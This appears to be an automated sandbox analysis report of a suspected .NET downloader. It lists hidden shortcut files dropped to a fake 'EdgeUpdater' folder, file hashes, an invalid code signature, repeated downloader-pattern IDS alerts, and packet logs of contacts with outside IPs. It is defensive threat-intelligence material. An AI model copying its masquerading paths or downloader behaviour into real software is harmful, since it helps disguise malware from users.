                Preview:L..................F....".....X:3....30M3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:57 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.937996177799057
                Encrypted:false
                SSDEEP:24:8MRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8aJD3lfAvRAt41vgHyg
                MD5:F77E0BD34A47D7F59FB0D86F74CF7EF9
                SHA1:D5B48E63A5BD84E39930DACC0EA1C0CEF9C0A5E0
                SHA-256:6B3F69412DE0E5DFD06A873AEF546B9BF713F8D46D67AEB9E02F67336F005095
                SHA-512:9A7CAFFA9814B0CC986F25DF1055171ACE3A8DD3AF9DBD77D24B00DE45DA062BE938E2D373521A131933784D05936C0425F4749E54A1F9F2E03B087BB27AA3DB
                Malicious:false
                Preview:L..................F....".....X:3.....V3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:30 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.93525835784918
                Encrypted:false
                SSDEEP:24:8XRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8BJD3lfAvRAt41vgHyg
                MD5:87DB89F6EB87B54F4CB7EC7BF79DECE7
                SHA1:C07FAE479A706400FA09F287018A68387B2CD9A8
                SHA-256:C7EC0D4AACDC7E14A8093263408AF4097E3E1812D210665A2DD0635A3CECF05F
                SHA-512:7301CAF683702A63E8153BEDC2D66053AABF5A696574112761CD767ABD39CF055646B272DA66FDC6272D205529AF500BC339F97B902B616484E8D155E0BA8C8A
                Malicious:false
                Preview:L..................F....".....X:3...p..F3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:39 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.934629174432057
                Encrypted:false
                SSDEEP:24:87+hRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:87EJD3lfAvRAt41vgHyg
                MD5:C4471C3CE3E0BD0AC095F4071FDFA76E
                SHA1:9772730DA7B1FCF833AD6946F072CCE57B637434
                SHA-256:7981BD0FF9DE5BE29D7BABF5EF545EE32F2CD5BD39E0EA8EB1D061930AFF32C4
                SHA-512:E05E5024B15CA97DFF43C6B4B843B066FC1EC33BE492D12A71F78BD0C44C19A98810A05B97C7DCEBC5E84B32F7C4C2825F726918F8B63EB229CED2361C3825A4
                Malicious:false
                Preview:L..................F....".....X:3......K3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:03 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.939888980892903
                Encrypted:false
                SSDEEP:24:8TRRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8TPJD3lfAvRAt41vgHyg
                MD5:DCB0B9B029662EF986E78B35B99647FF
                SHA1:F236505ECF71EA00DF3469536F58C38EB3D23B6D
                SHA-256:6D4337A15777DCFBA5C9F8C2E23FDFFA92418FB1B54410A06F42EB5E2C239ACA
                SHA-512:252EFA3B1CC6DDD338CADBAE6755C3630DCDC7960C097B33C04FF57FE3E90222279DD49243383CD74B15A4B2B37EDBAE12BF7AE57E73B44B0E5E9126EED7C8B2
                Malicious:false
                Preview:L..................F....".....X:3....6AZ3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:19 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.940811815819215
                Encrypted:false
                SSDEEP:24:8mRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8wJD3lfAvRAt41vgHyg
                MD5:72196D629A06F0015719ACA4BF4DBD1D
                SHA1:13FD85E503C0D22B81D00A371356B326079139DA
                SHA-256:1C33B4A303922F408879AA6E709770C384966D0EFCFA061F811D255E7CE8EE9A
                SHA-512:944F314BC1897897DBAD4ACB8125BE829A792A6C45D31CD4FE7DC3162B2DF264ED8E3BEC1B83A754DEEB8AB4ADDB1F5899E97178B0A9E0AD491AD577E48B9DA5
                Malicious:false
                Preview:L..................F....".....X:3......?3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:45 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.939719965614602
                Encrypted:false
                SSDEEP:24:8URJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8SJD3lfAvRAt41vgHyg
                MD5:B8ECDF4282352B523CF89F5645E89AA8
                SHA1:58A363B369C6771544CEDF6F3C87681B15D2EDE3
                SHA-256:A6CDD79FDF177C269292CF8B75EEF97E0ED2CC12C18EBB98D19C483310E3CEDA
                SHA-512:E436F28D8CBF87DA790E789DAC0607D7A4878EE34C1BA0A26BB1E935332C6A2F573B36D0A37D20933EF9CFCCC78DFC7FCC27861582946BA487E418EC77B30D78
                Malicious:false
                Preview:L..................F....".....X:3....E.O3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):7.063657397171467
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.96%
                • Win16/32 Executable Delphi generic (2074/23) 0.01%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                File name:file.exe
                File size:243'888 bytes
                MD5:f37e0267c53ae8e94fe38e87524b8c45
                SHA1:facaa93a619ab87da8ac448dd1fc71fb72e5380e
                SHA256:3ecf0a5fdc66d37c9e726334a0e57d6dc1e3ab622653d032f8db827185cc7c80
                SHA512:9684c9d8b8c6995f889be8e8a72e8340d12b32e85327c5b70892191f4510b32f374fc408aed1e37022326af43f620d187abfbc93f8f218488c65c3dd732ddb74
                SSDEEP:3072:CeuFCkfRp1vGUfQuDHI4AwFW2NcRscYhQ7zkt1gZyAJhETpee5n0dJhhGhzLsygP:CeuNp5GNuDHI4DyWlAif5neJC+S3S7
                TLSH:2B34AF5A6ED8ADC6CF88E3F8E1C502A4B7F0A601B94BE3D7251A56F41EC27D50E2510F
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@*..........."...0..V...........0... ........@.. .......................@............`................................
                Icon Hash:00928e8e8686b000
                Entrypoint:0x4130c4
                Entrypoint Section:."Rv
                Digitally signed:true
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0xD12A4096 [Fri Mar 14 19:46:30 2081 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                Signature Valid:false
                Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                Signature Validation Error:The digital signature of the object did not verify
                Error Number:-2146869232
                Not Before, Not After
                • 22/03/2021 01:00:00 22/03/2024 00:59:59
                Subject Chain
                • CN=Gary Kramlich, O=Gary Kramlich, STREET=2653 N 54TH ST, L=MILWAUKEE, S=Wisconsin, PostalCode=53210, C=US
                Version:3
                Thumbprint MD5:394B591BC2CE78B7CF207BF4082E62F4
                Thumbprint SHA-1:ADFA744AA074FB5DC57EE6445A3E18D606C7BF96
                Thumbprint SHA-256:AE7DB8B64E8ABD9D36876F049B9770D90C0868D7FE1A2D37CF327DF69FA2DBFE
                Serial:00F6AD45188E5566AA317BE23B4B8B2C2F
                Instruction
                jmp dword ptr [00408000h]
                sbb dword ptr [ebx], eax
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xc9440x28."Rv
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x400000x5a4.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x35c000x5cb0."Rv
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x420000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x319f00x38."Rv
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x80000x8.wyi
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x31a300x48."Rv
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x54c80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .wyi0x80000x80x2009bf113b5749ae48ee7c116da37df5b27False0.029296875ISO-8859 text, with no line terminators0.04078075625387197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                ."Rv0xa0000x34cf00x34e008b0b5300c49214c07b4c1e6e22a50d5eFalse0.6913185209810875data7.004647399293236IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc0x400000x5a40x600823c25fc832c6b9e2b329d77f19ff979False0.4186197916666667data4.067929421282105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x420000xc0x2004a9ae3fc69987bdb54333dac45060f05False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_VERSION0x400900x314data0.4352791878172589
                RT_MANIFEST0x403b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                DLLImport
                mscoree.dll_CorExeMain
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-10-03T03:26:15.106582+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649715172.67.74.15280TCP
                2024-10-03T03:26:47.122039+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649715172.67.74.15280TCP
                2024-10-03T03:26:48.278282+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649715172.67.74.15280TCP
                2024-10-03T03:27:20.653255+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652918104.26.12.20580TCP
                2024-10-03T03:27:22.080885+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652918104.26.12.20580TCP
                2024-10-03T03:27:54.825124+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652923104.26.12.20580TCP
                2024-10-03T03:27:56.022740+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652925104.26.12.20580TCP
                2024-10-03T03:28:02.137640+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652926104.26.12.20580TCP
                2024-10-03T03:28:03.435784+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652928104.26.12.20580TCP
                2024-10-03T03:28:24.997014+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652932104.26.12.20580TCP
                2024-10-03T03:28:26.590789+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652934104.26.12.20580TCP
                2024-10-03T03:28:29.090755+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652937104.26.12.20580TCP
                2024-10-03T03:28:30.647857+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652939104.26.12.20580TCP
                2024-10-03T03:28:34.834966+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652942104.26.12.20580TCP
                2024-10-03T03:28:37.434515+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652944104.26.12.20580TCP
                2024-10-03T03:28:42.604352+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652948104.26.12.20580TCP
                2024-10-03T03:28:43.997048+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652950104.26.12.20580TCP
                2024-10-03T03:28:48.497039+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652953104.26.12.20580TCP
                2024-10-03T03:28:49.793905+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652955104.26.12.20580TCP
                2024-10-03T03:29:22.098503+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652958104.26.12.20580TCP
                2024-10-03T03:29:23.611617+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652960104.26.12.20580TCP
                2024-10-03T03:29:55.934540+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652964104.26.12.20580TCP
                2024-10-03T03:29:57.044562+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652966104.26.12.20580TCP
                2024-10-03T03:29:58.796662+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652967104.26.12.20580TCP
                2024-10-03T03:30:00.325209+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652969104.26.12.20580TCP
                2024-10-03T03:30:09.503073+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652972104.26.12.20580TCP
                2024-10-03T03:30:11.138172+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652974104.26.12.20580TCP
                2024-10-03T03:30:20.325250+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652974104.26.12.20580TCP
                2024-10-03T03:30:21.326164+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652974104.26.12.20580TCP
                2024-10-03T03:30:53.325187+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.652974104.26.12.20580TCP
                TimestampSource PortDest PortSource IPDest IP
                Oct 3, 2024 03:26:13.135420084 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:26:13.140444994 CEST8049715172.67.74.152192.168.2.6
                Oct 3, 2024 03:26:13.141906023 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:26:13.177228928 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:26:13.182301998 CEST8049715172.67.74.152192.168.2.6
                Oct 3, 2024 03:26:13.622821093 CEST8049715172.67.74.152192.168.2.6
                Oct 3, 2024 03:26:13.659804106 CEST49716443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:13.659864902 CEST44349716104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:13.659923077 CEST49716443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:13.668855906 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:26:13.669996023 CEST49716443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:13.670013905 CEST44349716104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:14.335912943 CEST44349716104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:14.335993052 CEST49716443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:14.338884115 CEST49716443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:14.338893890 CEST44349716104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:14.339417934 CEST44349716104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:14.386739016 CEST49716443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:14.427401066 CEST44349716104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:14.488739014 CEST44349716104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:14.491853952 CEST49716443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:14.491864920 CEST44349716104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:14.937761068 CEST44349716104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:14.937947035 CEST44349716104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:14.938007116 CEST49716443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:14.943413019 CEST49716443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:14.953176022 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:26:14.958332062 CEST8049715172.67.74.152192.168.2.6
                Oct 3, 2024 03:26:15.060959101 CEST8049715172.67.74.152192.168.2.6
                Oct 3, 2024 03:26:15.062750101 CEST49717443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:15.062849998 CEST44349717104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:15.062932014 CEST49717443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:15.063538074 CEST49717443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:15.063577890 CEST44349717104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:15.106581926 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:26:15.548330069 CEST44349717104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:15.590863943 CEST49717443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:15.616992950 CEST49717443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:15.617006063 CEST44349717104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:15.716088057 CEST44349717104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:15.716454029 CEST49717443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:15.716500044 CEST44349717104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:16.004910946 CEST44349717104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:16.005019903 CEST44349717104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:16.005131006 CEST49717443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:16.005763054 CEST49717443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:16.009073973 CEST49718443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:16.009135962 CEST44349718104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:16.009234905 CEST49718443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:16.009593964 CEST49718443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:16.009629011 CEST44349718104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:16.468996048 CEST44349718104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:16.471159935 CEST49718443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:16.471189976 CEST44349718104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:16.593235970 CEST44349718104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:16.593612909 CEST49718443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:16.593674898 CEST44349718104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:16.940105915 CEST44349718104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:16.940211058 CEST44349718104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:16.940315962 CEST49718443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:16.940826893 CEST49718443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:46.951035023 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:26:46.956463099 CEST8049715172.67.74.152192.168.2.6
                Oct 3, 2024 03:26:47.076143980 CEST8049715172.67.74.152192.168.2.6
                Oct 3, 2024 03:26:47.078279018 CEST49729443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:47.078339100 CEST44349729104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:47.078618050 CEST49729443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:47.078762054 CEST49729443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:47.078794956 CEST44349729104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:47.122039080 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:26:47.605791092 CEST44349729104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:47.617801905 CEST49729443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:47.617834091 CEST44349729104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:47.739032030 CEST44349729104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:47.739453077 CEST49729443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:47.739495993 CEST44349729104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:48.117486954 CEST44349729104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:48.117595911 CEST44349729104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:48.117855072 CEST49729443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:48.118015051 CEST49729443192.168.2.6104.21.54.163
